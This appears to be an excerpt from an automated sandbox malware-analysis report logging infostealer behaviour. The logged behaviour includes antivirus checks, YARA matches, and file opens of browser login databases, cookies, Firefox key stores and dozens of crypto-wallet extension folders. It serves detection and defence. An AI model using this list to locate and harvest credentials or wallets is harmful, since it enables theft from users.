                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_0067CBEA
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B9DBA0 GetVersionExW,GetVersionExW,GetModuleHandleW,GetProcAddress,12_2_00B9DBA0
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.000000000121C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r\MsMpeng.exe
                        Source: b1dc05533c.exe, 00000014.00000003.269621268757.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675473570.0000000003BC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 8.2.axplong.exe.630000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.skotes.exe.9c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.0d47c4c34f.exe.b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.axplong.exe.630000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.660000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.skotes.exe.9c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.268855891646.0000000005400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.269317871785.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000003.269406632525.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.269472681805.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.268839327195.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.268857006626.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.269465852321.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: b1dc05533c.exe PID: 6412, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe, type: DROPPED
                        Source: Yara matchFile source: 00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
                        Source: b1dc05533c.exe, 00000014.00000003.269555760747.00000000012F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets!
                        Source: b1dc05533c.exe, 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                        Source: b1dc05533c.exe, 00000014.00000003.269581333238.00000000039E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty&
                        Source: b1dc05533c.exe, 00000014.00000002.269673864760.00000000012F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                        Source: b1dc05533c.exe, 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                        Source: b1dc05533c.exe, 00000014.00000002.269673864760.00000000012F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\security_state\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\shader-cache\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\default\moz-extension+++5e736be9-c24e-4afd-9b82-80cfe7b06e1d^userContextId=4294967295\idb\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\temporary\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kzpbmws1.default\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\bookmarkbackups\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\glean\tmp\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\default\moz-extension+++5e736be9-c24e-4afd-9b82-80cfe7b06e1d^userContextId=4294967295\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\default\moz-extension+++5e736be9-c24e-4afd-9b82-80cfe7b06e1d^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.files\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\minidumps\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\glean\pending_pings\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\glean\events\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\sessionstore-backups\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\journals\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\glean\db\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\archived\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\crashes\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\archived\2022-01\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
